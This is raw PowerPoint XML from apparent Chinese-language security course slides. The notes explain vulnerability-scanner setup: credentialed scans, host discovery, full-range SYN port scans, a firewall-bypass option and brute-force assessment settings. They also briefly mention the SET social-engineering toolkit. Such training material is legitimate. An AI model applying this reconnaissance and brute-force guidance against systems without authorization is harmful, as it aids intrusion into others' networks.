            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" b="0" i="0" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="121212"/>
                </a:solidFill>
                <a:effectLst/>
                <a:latin typeface="-apple-system"/>
              </a:rPr>
              <a:t>folder</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" b="0" i="0" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="121212"/>
                </a:solidFill>
                <a:effectLst/>
                <a:latin typeface="-apple-system"/>
              </a:rPr>
              <a:t>就是选择文件夹，比如刚才我们是新建的</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" b="0" i="0" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="121212"/>
                </a:solidFill>
                <a:effectLst/>
                <a:latin typeface="-apple-system"/>
              </a:rPr>
              <a:t>test</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" b="0" i="0" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="121212"/>
                </a:solidFill>
                <a:effectLst/>
                <a:latin typeface="-apple-system"/>
              </a:rPr>
              <a:t>文件夹，</a:t>
            </a:r>
            <a:br>
              <a:rPr lang="zh-CN" altLang="en-US" dirty="0"/>
            </a:br>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" b="0" i="0" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="121212"/>
                </a:solidFill>
                <a:effectLst/>
                <a:latin typeface="-apple-system"/>
              </a:rPr>
              <a:t>targets </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" b="0" i="0" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="121212"/>
                </a:solidFill>
                <a:effectLst/>
                <a:latin typeface="-apple-system"/>
              </a:rPr>
              <a:t>是扫描目标，可以填写</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" b="0" i="0" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="121212"/>
                </a:solidFill>
                <a:effectLst/>
                <a:latin typeface="-apple-system"/>
              </a:rPr>
              <a:t>IP</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" b="0" i="0" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="121212"/>
                </a:solidFill>
                <a:effectLst/>
                <a:latin typeface="-apple-system"/>
              </a:rPr>
              <a:t>地址也可以填写域名。</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" b="0" i="0" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="121212"/>
                </a:solidFill>
                <a:effectLst/>
                <a:latin typeface="-apple-system"/>
              </a:rPr>
              <a:t>name</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" b="0" i="0" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="121212"/>
                </a:solidFill>
                <a:effectLst/>
                <a:latin typeface="-apple-system"/>
              </a:rPr>
              <a:t>和</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" b="0" i="0" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="121212"/>
                </a:solidFill>
                <a:effectLst/>
                <a:latin typeface="-apple-system"/>
              </a:rPr>
              <a:t>targets </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" b="0" i="0" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="121212"/>
                </a:solidFill>
                <a:effectLst/>
                <a:latin typeface="-apple-system"/>
              </a:rPr>
              <a:t>必须填写，填写好后点击</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" b="0" i="0" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="121212"/>
                </a:solidFill>
                <a:effectLst/>
                <a:latin typeface="-apple-system"/>
              </a:rPr>
              <a:t>save</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" b="0" i="0" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="121212"/>
                </a:solidFill>
                <a:effectLst/>
                <a:latin typeface="-apple-system"/>
              </a:rPr>
              <a:t>保存。</a:t>
            </a:r>
            <a:endParaRPr lang="zh-CN" altLang="en-US" dirty="0"/>
          </a:p>
          <a:p>
            <a:endParaRPr lang="en-US" altLang="zh-CN" dirty="0"/>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" dirty="0"/>
              <a:t>Credentials</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" dirty="0"/>
              <a:t>登陆扫描，</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" b="0" i="0" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="4D4D4D"/>
                </a:solidFill>
                <a:effectLst/>
                <a:latin typeface="-apple-system"/>
              </a:rPr>
              <a:t>登录扫描肯定会比不登录扫描的结果更为准确</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" altLang="zh-CN" dirty="0"/>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、设置（</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="1200" b="0" i="0" kern="1200" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="tx1"/>
                </a:solidFill>
                <a:effectLst/>
                <a:latin typeface="+mn-lt"/>
                <a:ea typeface="+mn-ea"/>
                <a:cs typeface="+mn-cs"/>
              </a:rPr>
              <a:t>setting</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US"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2.1.1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DISCOVERY</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" sz="1200" b="0" i="0" kern="1200" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="tx1"/>
                </a:solidFill>
                <a:effectLst/>
                <a:latin typeface="+mn-lt"/>
                <a:ea typeface="+mn-ea"/>
                <a:cs typeface="+mn-cs"/>
              </a:rPr>
              <a:t>：</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" b="0" i="0" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="121212"/>
                </a:solidFill>
                <a:effectLst/>
                <a:latin typeface="-apple-system"/>
              </a:rPr>
              <a:t>Discovery</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" b="0" i="0" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="121212"/>
                </a:solidFill>
                <a:effectLst/>
                <a:latin typeface="-apple-system"/>
              </a:rPr>
              <a:t>里面有主机发现、端口扫描和服务发现等功能</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这个栏目包含</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="1200" b="0" i="0" kern="1200" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="tx1"/>
                </a:solidFill>
                <a:effectLst/>
                <a:latin typeface="+mn-lt"/>
                <a:ea typeface="+mn-ea"/>
                <a:cs typeface="+mn-cs"/>
              </a:rPr>
              <a:t>Host Discovery(</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" sz="1200" b="0" i="0" kern="1200" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="tx1"/>
                </a:solidFill>
                <a:effectLst/>
                <a:latin typeface="+mn-lt"/>
                <a:ea typeface="+mn-ea"/>
                <a:cs typeface="+mn-cs"/>
              </a:rPr>
              <a:t>主机发现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Port Scanning(</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" sz="1200" b="0" i="0" kern="1200" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="tx1"/>
                </a:solidFill>
                <a:effectLst/>
                <a:latin typeface="+mn-lt"/>
                <a:ea typeface="+mn-ea"/>
                <a:cs typeface="+mn-cs"/>
              </a:rPr>
              <a:t>端口发现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Service Discovery(</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" sz="1200" b="0" i="0" kern="1200" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="tx1"/>
                </a:solidFill>
                <a:effectLst/>
                <a:latin typeface="+mn-lt"/>
                <a:ea typeface="+mn-ea"/>
                <a:cs typeface="+mn-cs"/>
              </a:rPr>
              <a:t>服务发现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2.1.1.1 Host Discovery(</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" sz="1200" b="0" i="0" kern="1200" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="tx1"/>
                </a:solidFill>
                <a:effectLst/>
                <a:latin typeface="+mn-lt"/>
                <a:ea typeface="+mn-ea"/>
                <a:cs typeface="+mn-cs"/>
              </a:rPr>
              <a:t>主机发现</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主机发现中一般要开启</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="1200" b="0" i="0" kern="1200" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="tx1"/>
                </a:solidFill>
                <a:effectLst/>
                <a:latin typeface="+mn-lt"/>
                <a:ea typeface="+mn-ea"/>
                <a:cs typeface="+mn-cs"/>
              </a:rPr>
              <a:t>Ping</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" sz="1200" b="0" i="0" kern="1200" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="tx1"/>
                </a:solidFill>
                <a:effectLst/>
                <a:latin typeface="+mn-lt"/>
                <a:ea typeface="+mn-ea"/>
                <a:cs typeface="+mn-cs"/>
              </a:rPr>
              <a:t>功能需要按照需求进行配置，比较全面的扫描建议勾选</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="1200" b="0" i="0" kern="1200" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="tx1"/>
                </a:solidFill>
                <a:effectLst/>
                <a:latin typeface="+mn-lt"/>
                <a:ea typeface="+mn-ea"/>
                <a:cs typeface="+mn-cs"/>
              </a:rPr>
              <a:t>Ping Methods</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" sz="1200" b="0" i="0" kern="1200" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="tx1"/>
                </a:solidFill>
                <a:effectLst/>
                <a:latin typeface="+mn-lt"/>
                <a:ea typeface="+mn-ea"/>
                <a:cs typeface="+mn-cs"/>
              </a:rPr>
              <a:t>中</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="1200" b="0" i="0" kern="1200" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="tx1"/>
                </a:solidFill>
                <a:effectLst/>
                <a:latin typeface="+mn-lt"/>
                <a:ea typeface="+mn-ea"/>
                <a:cs typeface="+mn-cs"/>
              </a:rPr>
              <a:t>UDP</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" sz="1200" b="0" i="0" kern="1200" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="tx1"/>
                </a:solidFill>
                <a:effectLst/>
                <a:latin typeface="+mn-lt"/>
                <a:ea typeface="+mn-ea"/>
                <a:cs typeface="+mn-cs"/>
              </a:rPr>
              <a:t>选项，但是会降低效率和准确性。由于只对服务器进行信息统计，不对网络设备和打印机等进行统计，所以</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="1200" b="0" i="0" kern="1200" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="tx1"/>
                </a:solidFill>
                <a:effectLst/>
                <a:latin typeface="+mn-lt"/>
                <a:ea typeface="+mn-ea"/>
                <a:cs typeface="+mn-cs"/>
              </a:rPr>
              <a:t>Fragile Devices</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" sz="1200" b="0" i="0" kern="1200" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="tx1"/>
                </a:solidFill>
                <a:effectLst/>
                <a:latin typeface="+mn-lt"/>
                <a:ea typeface="+mn-ea"/>
                <a:cs typeface="+mn-cs"/>
              </a:rPr>
              <a:t>中的内容不进行设置。</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="1200" b="0" i="0" kern="1200" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="tx1"/>
                </a:solidFill>
                <a:effectLst/>
                <a:latin typeface="+mn-lt"/>
                <a:ea typeface="+mn-ea"/>
                <a:cs typeface="+mn-cs"/>
              </a:rPr>
              <a:t>2.1.1.2 Port Scanning(</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" sz="1200" b="0" i="0" kern="1200" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="tx1"/>
                </a:solidFill>
                <a:effectLst/>
                <a:latin typeface="+mn-lt"/>
                <a:ea typeface="+mn-ea"/>
                <a:cs typeface="+mn-cs"/>
              </a:rPr>
              <a:t>端口发现</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Port Scanning</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" sz="1200" b="0" i="0" kern="1200" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="tx1"/>
                </a:solidFill>
                <a:effectLst/>
                <a:latin typeface="+mn-lt"/>
                <a:ea typeface="+mn-ea"/>
                <a:cs typeface="+mn-cs"/>
              </a:rPr>
              <a:t>中进行信息收集时，将</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="1200" b="0" i="0" kern="1200" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="tx1"/>
                </a:solidFill>
                <a:effectLst/>
                <a:latin typeface="+mn-lt"/>
                <a:ea typeface="+mn-ea"/>
                <a:cs typeface="+mn-cs"/>
              </a:rPr>
              <a:t>Port scan range:</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" sz="1200" b="0" i="0" kern="1200" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="tx1"/>
                </a:solidFill>
                <a:effectLst/>
                <a:latin typeface="+mn-lt"/>
                <a:ea typeface="+mn-ea"/>
                <a:cs typeface="+mn-cs"/>
              </a:rPr>
              <a:t>设置为</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="1200" b="0" i="0" kern="1200" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="tx1"/>
                </a:solidFill>
                <a:effectLst/>
                <a:latin typeface="+mn-lt"/>
                <a:ea typeface="+mn-ea"/>
                <a:cs typeface="+mn-cs"/>
              </a:rPr>
              <a:t>1-65535</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" sz="1200" b="0" i="0" kern="1200" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="tx1"/>
                </a:solidFill>
                <a:effectLst/>
                <a:latin typeface="+mn-lt"/>
                <a:ea typeface="+mn-ea"/>
                <a:cs typeface="+mn-cs"/>
              </a:rPr>
              <a:t>进行全端口的扫描</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="1200" b="0" i="0" kern="1200" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="tx1"/>
                </a:solidFill>
                <a:effectLst/>
                <a:latin typeface="+mn-lt"/>
                <a:ea typeface="+mn-ea"/>
                <a:cs typeface="+mn-cs"/>
              </a:rPr>
              <a:t>Network Port Scanners</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" sz="1200" b="0" i="0" kern="1200" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="tx1"/>
                </a:solidFill>
                <a:effectLst/>
                <a:latin typeface="+mn-lt"/>
                <a:ea typeface="+mn-ea"/>
                <a:cs typeface="+mn-cs"/>
              </a:rPr>
              <a:t>中可以配置扫描的方式，默认是</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="1200" b="0" i="0" kern="1200" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="tx1"/>
                </a:solidFill>
                <a:effectLst/>
                <a:latin typeface="+mn-lt"/>
                <a:ea typeface="+mn-ea"/>
                <a:cs typeface="+mn-cs"/>
              </a:rPr>
              <a:t>SYN</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" sz="1200" b="0" i="0" kern="1200" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="tx1"/>
                </a:solidFill>
                <a:effectLst/>
                <a:latin typeface="+mn-lt"/>
                <a:ea typeface="+mn-ea"/>
                <a:cs typeface="+mn-cs"/>
              </a:rPr>
              <a:t>半开扫描，勾选</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="1200" b="0" i="0" kern="1200" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="tx1"/>
                </a:solidFill>
                <a:effectLst/>
                <a:latin typeface="+mn-lt"/>
                <a:ea typeface="+mn-ea"/>
                <a:cs typeface="+mn-cs"/>
              </a:rPr>
              <a:t>Override automatic firewall detection</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" sz="1200" b="0" i="0" kern="1200" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="tx1"/>
                </a:solidFill>
                <a:effectLst/>
                <a:latin typeface="+mn-lt"/>
                <a:ea typeface="+mn-ea"/>
                <a:cs typeface="+mn-cs"/>
              </a:rPr>
              <a:t>会自动进行防火墙探测。通过探测绕过防火墙。</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="1200" b="0" i="0" kern="1200" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="tx1"/>
                </a:solidFill>
                <a:effectLst/>
                <a:latin typeface="+mn-lt"/>
                <a:ea typeface="+mn-ea"/>
                <a:cs typeface="+mn-cs"/>
              </a:rPr>
              <a:t>2.1.1.3 Service Discovery(</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" sz="1200" b="0" i="0" kern="1200" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="tx1"/>
                </a:solidFill>
                <a:effectLst/>
                <a:latin typeface="+mn-lt"/>
                <a:ea typeface="+mn-ea"/>
                <a:cs typeface="+mn-cs"/>
              </a:rPr>
              <a:t>服务发现</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可以设置端口服务探测，勾选</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="1200" b="0" i="0" kern="1200" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="tx1"/>
                </a:solidFill>
                <a:effectLst/>
                <a:latin typeface="+mn-lt"/>
                <a:ea typeface="+mn-ea"/>
                <a:cs typeface="+mn-cs"/>
              </a:rPr>
              <a:t>Probe all ports to find services</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" sz="1200" b="0" i="0" kern="1200" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="tx1"/>
                </a:solidFill>
                <a:effectLst/>
                <a:latin typeface="+mn-lt"/>
                <a:ea typeface="+mn-ea"/>
                <a:cs typeface="+mn-cs"/>
              </a:rPr>
              <a:t>，对所有端口上运行的服务进行探测，</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b="0" i="0" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="121212"/>
                </a:solidFill>
                <a:effectLst/>
                <a:latin typeface="-apple-system"/>
              </a:rPr>
              <a:t>Report</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" b="0" i="0" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="121212"/>
                </a:solidFill>
                <a:effectLst/>
                <a:latin typeface="-apple-system"/>
              </a:rPr>
              <a:t>里面是报告的一些设定；</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" b="0" i="0" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="121212"/>
                </a:solidFill>
                <a:effectLst/>
                <a:latin typeface="-apple-system"/>
              </a:rPr>
              <a:t>Assessment</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-TW" altLang="en-US" b="0" i="0" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="303233"/>
                </a:solidFill>
                <a:effectLst/>
                <a:latin typeface="Lato" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
              </a:rPr>
              <a:t>可以</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" b="0" i="0" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="303233"/>
                </a:solidFill>
                <a:effectLst/>
                <a:latin typeface="Lato" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
              </a:rPr>
              <a:t>针对</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-TW" b="0" i="0" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="303233"/>
                </a:solidFill>
                <a:effectLst/>
                <a:latin typeface="Lato" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
              </a:rPr>
              <a:t>Web</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" b="0" i="0" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="303233"/>
                </a:solidFill>
                <a:effectLst/>
                <a:latin typeface="Lato" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
              </a:rPr>
              <a:t>服务扫描</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-TW" altLang="en-US" b="0" i="0" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="303233"/>
                </a:solidFill>
                <a:effectLst/>
                <a:latin typeface="Lato" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
              </a:rPr>
              <a:t>、暴力破解、</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" b="0" i="0" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="303233"/>
                </a:solidFill>
                <a:effectLst/>
                <a:latin typeface="Lato" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
              </a:rPr>
              <a:t>恶意软件侦测</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-TW" altLang="en-US" b="0" i="0" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="303233"/>
                </a:solidFill>
                <a:effectLst/>
                <a:latin typeface="Lato" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
              </a:rPr>
              <a:t>做設定</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" b="0" i="0" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="303233"/>
                </a:solidFill>
                <a:effectLst/>
                <a:latin typeface="Lato" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
              </a:rPr>
              <a:t>。</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-TW" altLang="en-US" b="0" i="0" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="303233"/>
                </a:solidFill>
                <a:effectLst/>
                <a:latin typeface="Lato" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
              </a:rPr>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" b="0" i="0" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="121212"/>
                </a:solidFill>
                <a:effectLst/>
                <a:latin typeface="-apple-system"/>
              </a:rPr>
              <a:t>Advanced</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" b="0" i="0" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="121212"/>
                </a:solidFill>
                <a:effectLst/>
                <a:latin typeface="-apple-system"/>
              </a:rPr>
              <a:t>里面是一些超时、同时扫描多少项等基础设定，</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" altLang="zh-CN" sz="1200" dirty="0">
              <a:solidFill>
                <a:schemeClr val="accent2"/>
              </a:solidFill>
              <a:latin typeface="华文楷体" panose="02010600040101010101" pitchFamily="2" charset="-122"/>
              <a:ea typeface="华文楷体" panose="02010600040101010101" pitchFamily="2" charset="-122"/>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:endParaRPr lang="zh-CN" altLang="en-US" sz="1200" dirty="0">
              <a:solidFill>
                <a:schemeClr val="accent2"/>
              </a:solidFill>
              <a:latin typeface="华文楷体" panose="02010600040101010101" pitchFamily="2" charset="-122"/>
              <a:ea typeface="华文楷体" panose="0201060004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0E9C3F2-20D7-4333-93B0-0875AF8439D3}" type="slidenum">
              <a:rPr kumimoji="0" lang="zh-CN" altLang="en-US" sz="12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30673174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重启，多攻击两次，等一下</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="4" name="灯片编号占位符 3"/>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="sldNum" sz="quarter" idx="5"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr/>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:fld id="{80E9C3F2-20D7-4333-93B0-0875AF8439D3}" type="slidenum">
              <a:rPr lang="zh-CN" altLang="en-US" smtClean="0"/>
              <a:pPr/>
              <a:t>62</a:t>
            </a:fld>
            <a:endParaRPr lang="zh-CN" altLang="en-US"/>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="19659797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800" dirty="0">
              <a:effectLst/>
              <a:ea typeface="宋体" panose="02010600030101010101" pitchFamily="2" charset="-122"/>
            </a:endParaRPr>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="4" name="灯片编号占位符 3"/>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="sldNum" sz="quarter" idx="5"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr/>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:fld id="{80E9C3F2-20D7-4333-93B0-0875AF8439D3}" type="slidenum">
              <a:rPr lang="zh-CN" altLang="en-US" smtClean="0"/>
              <a:pPr/>
              <a:t>63</a:t>
            </a:fld>
            <a:endParaRPr lang="zh-CN" altLang="en-US"/>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="26566497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0E9C3F2-20D7-4333-93B0-0875AF8439D3}" type="slidenum">
              <a:rPr lang="zh-CN" altLang="en-US" smtClean="0"/>
              <a:pPr/>
              <a:t>64</a:t>
            </a:fld>
            <a:endParaRPr lang="zh-CN" altLang="en-US"/>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="9428913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输出详细介绍了</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" dirty="0"/>
              <a:t>SET</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" dirty="0"/>
              <a:t>，显示了创建者，版本和菜单信息。此使根据自己的需要，选择相应的编号进行操作。</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="4" name="灯片编号占位符 3"/>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="sldNum" sz="quarter" idx="10"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr/>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:fld id="{80E9C3F2-20D7-4333-93B0-0875AF8439D3}" type="slidenum">
              <a:rPr lang="zh-CN" altLang="en-US" smtClean="0"/>
              <a:pPr/>
              <a:t>65</a:t>
            </a:fld>
            <a:endParaRPr lang="zh-CN" altLang="en-US"/>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="18980427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https://blog.csdn.net/qq_53079406/article/details/126210209</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr algn="l"/>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" b="0" i="0" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="333333"/>
                </a:solidFill>
                <a:effectLst/>
                <a:latin typeface="Arial" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
              </a:rPr>
              <a:t>攻击向量一般用于描述攻击者</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或恶意软件</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的攻击路径。</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" altLang="zh-CN" dirty="0"/>
          </a:p>
          <a:p>
            <a:pPr algn="l">
              <a:buFont typeface="+mj-lt"/>
              <a:buNone/>
            </a:pPr>
            <a:endParaRPr lang="en-US" altLang="zh-CN" b="0" i="0" dirty="0">
              <a:solidFill>
                <a:srgbClr val="4F4F4F"/>
              </a:solidFill>
              <a:effectLst/>
              <a:latin typeface="PingFang SC"/>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:pPr marL="0" marR="0" lvl="0" indent="0" algn="l" defTabSz="914400" rtl="0" eaLnBrk="0" fontAlgn="base" latinLnBrk="0" hangingPunct="0">
              <a:lnSpc>
                <a:spcPct val="100000"/>
              </a:lnSpc>
              <a:spcBef>
                <a:spcPct val="30000"/>
              </a:spcBef>
              <a:spcAft>
